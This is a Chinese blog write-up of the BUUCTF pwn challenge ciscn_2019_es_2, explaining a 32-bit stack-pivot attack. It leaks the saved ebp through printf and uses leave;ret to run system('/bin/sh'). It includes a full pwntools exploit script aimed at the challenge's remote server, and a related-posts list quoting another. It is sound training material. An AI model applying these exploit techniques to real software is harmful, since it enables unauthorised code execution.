BUUCTF栈迁移ciscn_2019_es_2

已于 2022-04-22 21:55:30 修改
阅读量1k 收藏 5
点赞数 3
分类专栏: BUUCTF 文章标签: python
于 2022-04-09 12:24:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/arraylocalhost/article/details/124055463
版权

1.checksec+运行获取基本信息

32位+NX堆栈不可执行

2.常规IDA操作

1.main函数

并没有什么

2.int vul()函数

程序主体,信息很多

1.两次read都在往同一个地方s处读入数据

2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作

但是shift+f12

 这里仅仅是打印flag字符串,没有用

同时查看hack函数

system里面的参数不是bin_sh不能直接用,所以要修改system的参数

但是...........

s只有0x28,要读入0x30,所以只有0x30-0x28=0x8的空间让我们构造ROP链

于是乎

我们找新的地方,足够大来构造,也就是

栈迁移

但是栈迁移不是想用就能用的,需要满足条件

1.存在leave ret的gadget指令

2.存在可执行shellcode的地方(system函数,自己写入binsh)

 利用思路+具体操作

题目两次read读入,有两次溢出,第一次溢出需要泄露栈上地址,为第二次迁移准备(确定迁移地址)

程序提供了printf函数,该函数有一个特性,在没有遇到终止符"\0"会一直输出,可利用它泄露出栈上地址,得到劫持位置的准确地址.

payload1 = b'A' * (0x27) + b'B'#留一个位置补"\0"#连带打印出ebp的地址
p.send(payload1) # 不要用 sendline,sendline会发送空格,导致无法补"\0"中断
p.recvuntil("B")#接收printf返回的ebp前要先recv前面read输入的内容
old_ebp = u32(p.recv(4))
print(hex(original_ebp))

缓冲区参数s的位置可以用ebp寻址,所以用printf泄露ebp的地址

用gdb确定参数位置

应该是不能在main函数下断点,断点下在main函数,不能再输入参数了

单用gdb不开root权限,可以输入,但是好像不能看栈的结构

 其实下在main函数处

输入n,多运行几步,n到可以输入参数的位置就行了,但是要注意别n过头了

所以在想一个问题:

如何找到合适的下断点的位置?

目前还没有找到,先记下了----2022年4月22日晚10点记

将断点下在vul函数的nop位置

 输入bbbb确定位置

python 计算一下

 

 确定s位置

ebp-0x38

具体攻击过程

1.覆盖原栈上ret为leave ret的地址

2.将old_ebp覆盖为old_ebp-0x38,old_ebp已通过printf泄露出来

栈空间不会复原,而是

之后执行第二个leave ret,也就是已经实现将 esp 劫持至 old_ebp -0x38处的栈迁移效果

接下来

为常规的栈溢出操作,执行 system 的shellcode 以完成对 eip 与执行流的篡改

payload2 = b'aaaa'

payload2 += p32(system_addr)

payload2 += b'bbbb'

payload2 += p32(original_ebp - 0x28) #迁移到新位置就是一个正常的栈溢出,s大小为0x28
payload2 += b'/bin/sh\x00' 
payload2 = payload2.ljust(0x28, b'p')

 补充:Python ljust知识

Python ljust() 方法返回一个原字符串左对齐,并使用空格填充至指定长度的新字符串。如果指定的长度小于原字符串的长度则返回原字符串。

str = "this is string example....wow!!!";

print str.ljust(50, '0');

输出结果: 

this is string example....wow!!!000000000000000000

接着构造

payload2 += p32(original_ebp - 0x38) # 参数s的位置
payload2 += p32(leave_ret) # new leave ret

写到这里,最后交互,攻击就结束了

完整的脚本

from pwn import*
#p=process('./ciscn2019es2')
p=remote("node4.buuoj.cn",28058)



system_addr = 0x08048400
leave_ret = 0x080484b8

payload1 = b'A' * (0x27) + b'B'
p.send(payload1) # not sendline
p.recvuntil("B")
original_ebp = u32(p.recv(4))
print(hex(original_ebp))

payload2 = b'aaaa' 
payload2 += p32(system_addr)
payload2 += b'bbbb'
payload2 += p32(original_ebp - 0x28)
payload2 += b'/bin/sh\x00'
payload2 = payload2.ljust(0x28, b'p')

payload2 += p32(original_ebp - 0x38) 
payload2 += p32(leave_ret) 

p.sendline(payload2)
p.interactive()

Rt1Text
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
【PWN · 迁移】[BUUCTF]ciscn_2019_es_2
Mr_Fmnwon的博客
07-30 460
当前溢出可用空间比较少时(极端情况下仅能覆写ebp和ret),可以通过迁移的方式,扩大shellcode的容纳空间,其核心是将esp移动到一段shellocode开头。而esp总是由ebp赋值,所以总是通过两次leave;ret的方式修改esp到固定位置。一、代码审计有两次读入操作。read进的内容超过字符串的长度,存在溢出漏洞。然而计算溢出长度,发现只有8字节,即刚好可以覆写ebp和ret。发现system的函数(意味着plt对应的表项存在),然而这个hack函数并不能给出flag。
ciscn_2019_es_2【BUUCTF
qq_41696518的博客
09-02 840
与往常溢出不同的是,该溢出仅仅只能溢出8(0x30-0x28)字节的数据,恰好就是覆盖ebp和ret地址数据,并且存在两处溢出漏洞。因此可以用read函数将system(“/bin/sh”)读到当前中,并返回让其执行该函数即可。这里有两个问题,1.system(“/bin/sh”)存储地址如何得知 2. 如何返回该system地址执行函数。
BUUCTFPWN】ciscn_2019_es_2 迁移 劫持
最新发布
m0_55368674的博客
01-16 624
BUUCTFPWN】ciscn_2019_es_2题解
[BUUCTF]PWN——ciscn_2019_es_2
mcmuyanga的博客
10-27 2262
ciscn_2019_es_2 附件 步骤: 例行检查,32位程序,开启了nx保护 32位ida载入,shif+f12查看程序里的字符串,这边的“echo flag” 是个迷惑性的字符串,它只是输出了flag这4个字符,但是程序里有system函数,到时候这个函数可以直接拿来使用 system_addr=0x80048400 main函数 程序主体在vul函数里 读入0x30字节数据给s,s大小是0x28,只能溢出0x8字节,覆盖到ret,没法构造太长的rop,但是这边可以给s写入
PWN——迁移
L2329794714的博客
08-29 1507
简单一句话就是控制esp指针的指向。实现指令:eave;ret 指令Leave等价于:其实就是在做恢复上一次空间的操作。但这过程中能恢复到上次的的关键数据为当前ebp指向地址上值(oldebp),当我们通过溢出覆盖原本的oldebp值时,然后将leave;ret 程序段地址放在返回地址上,那么就可以实现将esp迁移至我们想要的地方(取决于oldebp上的覆盖的地址,注意这里会抬高4字节,64位抬8字节)。第一次leave第一次ret:因为esp还是指向leave;.........
TrAdaboost.rar_Adaboost 过学习_sitfod_tradaboost.R2_迁移学习_迁移学习python
07-15
迁移学习中经典算法Tradaboost的python实现
COMSOL_News_2019_ElectricPower.pdf
03-24
COMSOL_News_2019_ElectricPower 电力专辑
mobilenet_v2-b0353104.zip
03-28
mobilenet_v2的预训练模型,可以用于迁移学习训练。
三重迁移学习代码和数据.rar_cottoniwz_三重迁移_三重迁移学习_迁移学习_迁移学习 数据
07-14
三重迁移学习代码以及数据,用于发现文本分类~~
VMware_物理机迁移到虚拟机P2V(热迁移).pdf
07-13
VMware_物理机迁移到虚拟机P2V(热迁移).pdfVMware_物理机迁移到虚拟机P2V(热迁移).pdfVMware_物理机迁移到虚拟机P2V(热迁移).pdfVMware_物理机迁移到虚拟机P2V(热迁移).pdfVMware_物理机迁移到虚拟机P2V(热迁移)....
[BUUCTF]PWN——gyctf_2020_borrowstack
mcmuyanga的博客
11-17 1444
gyctf_2020_borrowstack 附件 步骤: 例行检查,64位程序,开启NX保护 本地运行一下程序,看看大概的情况 64位ida载入,直接从main函数开始看程序, buf可以溢出0x10字节,只能够覆盖到ret,参数bank在bss段上,所以打算在buf处利用leave指令去劫持,让它跳转去bank处,往bank里写入我们的ret2libc的攻击链去获取shell 随便找个leave指令的地址,leave=0x400699 bank在bss段上的地址 设置rdi寄存器的指令地
ciscn_2019_es_2
z1r0的博客
12-08 200
ciscn_2019_es_2 查看保护 有溢出,但是溢出有限,所以可以考虑一下迁移迁移其实就是通过ebp和esp间接跳板来控制eip执行system即可。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 28028) else: r = pro
ciscn_2019_es_1
z1r0的博客
01-12 855
ciscn_2019_es_1 查看保护 有一个uaf在call函数里,2.27下可以double free的libc,思路很明确,直接申请大堆泄露出libc_base,再double free劫持tcache链表,写入free_hook进tcache。改hook为one_gadget即可。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if
的小复习:
yms0211的博客
05-18 315
的小复习: 这一次以一道简洁的题来回顾一下前面的知识与应用: 格式化字符串与迁移: 首先看一下题目的保护: 除了canary都开了,其实对我们后面溢出时的操作是比较友好的。 静态分析: 然后我们进入IDA看一下反编译的伪代码: __int64 __fastcall main(__int64 a1, char **a2, char **a3) { sub_7DA(a1, a2, a3); sub_83B(); return 0LL; } main函数非常简单,只有两个函数,第一个函数
迁移原理介绍与应用
weixin_39529207的博客
02-20 4842
本文将对CTF Pwn中「迁移」(又称「转移」)这一技术进行介绍与分析,希望读完本文后以下问题将不再困扰你: 什么是迁移迁移解决了什么问题? 怎么使用迁移这个技巧? 开始之前,有如下预备知识会极大提升你的阅读体验: CTF Pwn是在做什么?提权(Getshell)是什么意思? 在操作系统内存布局中,是一种怎样的结构,具有怎样的特点? x86中常用寄存器的名称与作用?函数调用的原理与过程是怎样的? 溢出攻击的核心技巧是什么? 溢出是怎么回事?  在预备知识的4个问
ciscn_2019_es_2——wp
xuaohu123的博客
12-23 831
buuctf ciscn_2019_es_2
【pwn】ciscn_2019_es_2
Nothing
12-24 2762
例行检查 分析程序,程序存在system函数,但是不能直接得到flag。 vul函数中存在溢出,但只能溢出8个字节,只能盖到ebp和ret。vul函数中有两次read和printf第一次可以用来泄露ebp,得到地址,然后进行迁移。然后利用main函数返回时将控制流转到system。 根据一下汇编代码布置数据。 from pwn import * #io=process('ciscn...
迁移学习(buuctf [Black Watch 入群题])
像初雪一样自由洒落
03-14 982
i春秋的borrowstack是迁移和万能gadget的混合,,,然后writeup看的不是很明白,也没有很细的解析,所以,emmm,应该是自己迁移学的不是很好,只是知道大概的意思,但是还没有做过题,这次在看雪看到文章,就好好学一下,做到题啦!! 迁移,我觉得比较好理解,如果试过将调用一个函数过程好好自己试过的话,知道控制ebp,可以控制函数的去向,详细可以看看这篇图示:https://b...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值